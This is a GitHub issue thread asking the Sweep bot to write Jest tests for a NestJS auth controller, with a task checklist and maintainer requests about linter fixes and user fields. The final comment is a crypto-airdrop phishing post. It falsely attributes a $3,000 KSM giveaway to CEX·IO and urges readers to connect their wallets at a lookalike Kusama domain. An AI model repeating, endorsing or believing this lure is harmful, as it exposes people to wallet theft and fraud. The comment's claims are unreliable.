### ISSUE TITLE
Sweep: Write a test for src/modules/auth/auth.controller.ts

### ISSUE THREAD

**Issue by NarHakobyan** [NarHakobyan/awesome-nest-boilerplate#326]
<details open>
<summary>Checklist</summary>

- [X] `src/modules/auth/auth.controller.spec.ts`
> • Import the necessary dependencies at the top of the file. This includes the TestingModule from '@nestjs/testing', the AuthController, AuthService, and UserService from their respective paths, and the UserLoginDto, UserRegisterDto, and UserEntity from their respective paths.
> • In the beforeAll block, update the providers array to include mocked versions of the AuthService and UserService. Use jest.fn() to create the mock functions.
> • Write a test for the userLogin method. In this test, call the userLogin method with a mock UserLoginDto and assert that the returned value matches the expected result. Also, test what happens when the AuthService throws an error.
> • Write a test for the userRegister method. In this test, call the userRegister method with a mock UserRegisterDto and a mock file, and assert that the returned value matches the expected result. Also, test what happens when the UserService throws an error.
> • Write a test for the getCurrentUser method. In this test, call the getCurrentUser method with a mock UserEntity and assert that the returned value matches the expected result.

</details>

**Comment by NarHakobyan** [comment]
fix linter issues

**Comment by NarHakobyan** [comment]
Add all missing fields for user, for example here `const mockUserDto = { user: {} };`

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
